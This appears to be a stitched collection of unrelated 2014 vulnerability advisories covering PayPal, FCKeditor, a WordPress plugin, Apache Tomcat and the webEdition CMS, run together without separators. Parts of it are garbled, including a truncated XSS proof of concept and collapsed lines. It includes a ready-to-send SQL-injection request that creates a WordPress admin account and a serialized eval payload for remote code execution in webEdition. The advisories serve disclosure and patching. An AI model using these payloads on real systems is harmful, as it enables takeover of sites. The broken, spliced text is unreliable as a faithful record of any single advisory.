Paypal Inc Bug Bounty #36 - SecurityKey Card Serialnumber Module Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=834


Release Date:
=============
2014-06-18


Vulnerability Laboratory ID (VL-ID):
====================================
834


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

( Copy of the Homepage: www.paypal.com ) [ http://en.wikipedia.org/wiki/PayPal ]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official PayPal Inc web-application & api.


Vulnerability Disclosure Timeline:
==================================
2012-10-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-10-27: Vendor Notification (PayPal Inc Site Security Team - Bug Bounty Program)
2012-10-28: Vendor Response/Feedback (PayPal Inc Site Security Team - Bug Bounty Program)
2013-08-12: Vendor Fix/Patch (PayPal Inc - Develoepr Team)
2014-06-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: PayPal Account Service Application 2013 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side validation web vulnerability has been discovered in the official PayPal Inc web-application and api.
The vulnerability allows remote attackers to inject own malicious arbitrary codes on the application-side of the service.

The input of the paypal  security card serialnumber does not validate special chars. Regular the serialnumber must be 
an integer value (numbers). In case of the vulnerable input attackers are able to use 2 x 6 char long pin codes to save 
a not secure encoded serialnumber input. The validation of the serialnumber input field should use the same char restriction 
on input like the pin code input fields to prevent. During the testings we ordered a secure paypal pin card for payments with 
a malicious test payload in the stored serialnumber value. In case of a real attack scenario the attacker had all abilities 
to order cards with manipulated serial numbers. The attack vector of the vulnerability is on the application-side of the 
paypal online-service and the request method to inject is POST.

The security risk of the application-side validation vulnerability in the security card system module is estimated as medium 
with a cvss (common vulnerability scoring system) count of 4.3.

Exploitation of the application-side validation vulnerability requires a low privileged paypal account with restricted access 
and no user interaction. Successful exploitation of the vulnerability results in security card system manipulation/compromise, 
card serialnumber compromise and sessionhijacking.

Request Method(s): Inject
    [+] POST

Vulnerable Module(s):
    [+] PayPal SecurityKey (Card Service)

Vulnerable Parameter(s): Input
    [+] Serialnumber (Seriennummer)

Affected Service(s):
    [+] PayPal SecurityKey Card < Serialnumber (Seriennummer)


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable serialnumber input field.


Security Risk:
==============
The security risk of the persistent validation web vulnerability in the serialnumber input is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    dev.vulnerability-db.com   - forum.vulnerability-db.com            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Class  Cross-Site Scripting
Remote Yes
Published 2nd June 2014
Credit  Robin Bailey of Dionach (vulns@dionach.com)
Vulnerable FCKeditor <= 2.6.10

FCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.

FCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable. 

Note that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded.

PoC:

POST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
textinputs[1

]=zz The vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement: http://ckeditor.com/blog/FCKeditor-2.6.11-Released Timeline: 28/05/2014 Vulnerability identified 28/05/2014 Initial vendor contact 28/05/2014 Vendor response to contact 28/05/2014 Vulnerability disclosed to vendor 29/05/2014 Vendor confirms vulnerability 02/06/2014 Vendor releases patch 02/06/2014 Public disclosure of vulnerability ______________________________________________________________________ Disclaimer: This e-mail and any attachments are confidential. It may contain privileged information and is intended for the named addressee(s) only. It must not be distributed without Dionach Ltd consent. If you are not the intended recipient, please notify the sender immediately and destroy this e-mail. Any unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd. Dionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242 ______________________________________________________________________

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================================

Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

— Vulnerability details —

1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions If any of
the shortcodes is used (e.g. signup page).

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).


— Exploit —

Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):


POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN

------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"

output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"

participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"

participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"

INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);

------WebKitFormBoundaryuoACADe1C2IFWMxN



— Solution —

This issue has been fixed in version 1.5.4.9. Download the newest version
from:

https://wordpress.org/plugins/participants-database/


— Credit —


Yarubo Research Team
research [at] yarubo.com

Network Security Scan:
http://www.yarubo.com/

Free Heartbleed Scan:
http://www.yarubo.com/heartbleed

CVE-2014-0096 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The default servlet allows web applications to define (at multiple
levels) an XSLT to be used to format a directory listing. When running
under a security manager, the processing of these was not subject to the
same constraints as the web application. This enabled a malicious web
application to bypass the file access constraints imposed by the
security manager via the use of external XML entities.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html

Advisory: Remote Command Execution in webEdition CMS Installer Script

RedTeam Pentesting discovered a remote command execution vulnerability
in the installer script of the webEdition CMS during a penetration test.
If the installer script is not manually removed after installation,
attackers cannot only reinstall webEdition, but also gain remote command
execution.


Details
=======

Product: webEdition CMS
Affected Versions: webEdition OnlineInstaller 2.8.0.0,
                   probably earlier versions, too
Fixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004
Advisory Status: published
CVE: CVE-2014-2302
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302


Introduction
============

"webEdition is a flexible CMS for companies of every size. It offers a
great amount of functionality and can be flexibly customized for
individual needs. It is ideally suited for users who want to operate
their website comfortably. Even the creation of custom web applications
is easily possible with webEdition."

(translated from the webEdition homepage)


More Details
============

The webEdition installation script is not deleted automatically at the
end of the installation, even though it contains code to delete itself.
While an attacker who finds this script could just destructively
reinstall webEdition, it is also possible to use it to gain command
execution unnoticed on an existing webEdition installation.

During installation, the installer first checks whether outgoing
connections can be established by sending the following HTTP request to
update.webedition.org:

GET /server/we/onlineInstallation.php?update_cmd=checkConnection&
     HTTP/1.0
Host: update.webedition.org

The server at update.webedition.org replies with the following HTTP
response, which contains base64-encoded data (formatted and shortened):

HTTP/1.1 200 OK
Date: Mon, 24 Feb 2014 10:34:56 GMT
Server: Apache/2.X.XX
X-Powered-By: PHP/5.X.XX
Connection: close
Content-Type: text/html

YTozOntzOjQ6IlR5cGUiO3M6ODoidGVtcGxhdGUiO3M6ODoiSGVhZGxpbmUiO3M6MzA6Ik9u
bGluZSBJbnN0YWxsZXIgdmVyc2lvbiBjaGVjayI7czo3OiJDb250ZW50IjtzOjM5ODoiCjxk
aXYgY2xhc3M9Im1lc3NhZ2VEaXYiPgpZb3UgYXJlIGN1cnJlbnRseSB1c2luZyBhbiBvbGQg
[...]

By decoding the response body it can be seen that it contains a
serialized PHP object:

a:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer
version check";s:7:"Content";s:398:"

You are currently [...]

.";} This PHP object is processed by the installation script based on its "Type" value. One of the "Type" values accepted by the installation script is "eval", leading to the execution of PHP code which can be specified as the value of a field named "Code", that is also part of the serialized object. Using the Python library phpserialize, a PHP object can be crafted, which executes the function phpinfo() when it is received by the installation script: $ python >>> from phpserialize import dumps >>> object = dumps({"Type": "eval", "Code": ""}) >>> object.encode("base64") 'YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtz OjQ6\nImV2YWwiO30=\n' The installer allows the usage of a proxy server, enabling attackers to intercept and arbitrarily modify HTTP requests issued by the installer and the corresponding responses by the host update.webedition.org. By setting a proxy server to use during the installation process which answers all requests with the base64-encoded serialized PHP object, the previously created PHP code is loaded and evaluated by the installation script, which leads to the execution of the attack payload. Due to the proxy server being saved in the HTTP session used by the installation script, execution of the code served by the proxy server can be triggered by opening the following URL: http://www.example.com/OnlineInstaller/setup.php? &leWizard=DownloadInstaller Proof of Concept ================ Use the OnlineInstaller at http://www.example.com/OnlineInstaller/setup.php to configure webEdition to use a system under your control as a proxy server. Configure the proxy to deliver the following file contents for all HTTP requests: YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjt zOjQ6ImV2YWwiO30= Reopen the following URL: http://www.example.com/OnlineInstaller/setup.php? &leWizard=DownloadInstaller After a redirect, phpinfo() output will be shown. Workaround ========== The OnlineInstaller should be deleted or access to its URLs restricted. Fix === Update to a version with the suffix -s1. Those versions are available as updates for releases between 6.2.7 and 6.3.8. The newest, updated version would therefore be 6.3.8-s1. Note that the version check of webEdition might tell you that there is no update available and that you are running Version "6.3.8 (6.3.8.0 Release, SVN-Revision 6985). It will still tell you that the newest available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so you can use the "Update-Repetition" function to get the fix for this vulnerability. Also note that the update does not remove the OnlineInstaller, but modifies the login dialogue to remove the OnlineInstaller instead. You will need to open the login dialogue after installing the update to actually delete the OnlineInstaller. To be on the safe side, check the OnlineInstaller directory manually for any files that still need to be removed. Security Risk ============= Attackers can not only use the OnlineInstaller to destructively reinstall webEdition, but can also run arbitrary code PHP code by setting their own proxy server in the OnlineInstaller and inject content that is used as a parameter for the PHP eval() function. Since this attacker-supplied code is executed on the webEdition server with the privileges of the web server, this is a high risk, especially because the attack is not as easy to detect as a reinstallation of webEdition by an attacker. Timeline ======== 2014-02-20 Vulnerability identified 2014-03-04 Customer approved disclosure to vendor 2014-03-06 CVE number requested and assigned 2014-03-07 Vendor notified 2014-03-10 Vendor acknowledges vulnerability 2014-05-20 Vendor announces fixed versions 2014-05-28 Advisory released References ========== http://www.webedition.org/de/aktuelles/webedition-cms/ Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht (German) http://www.webedition.org/de/aktuelles/webedition-cms/ Wichtige-Hinweise-zum-Sicherheitsupdate (German) RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen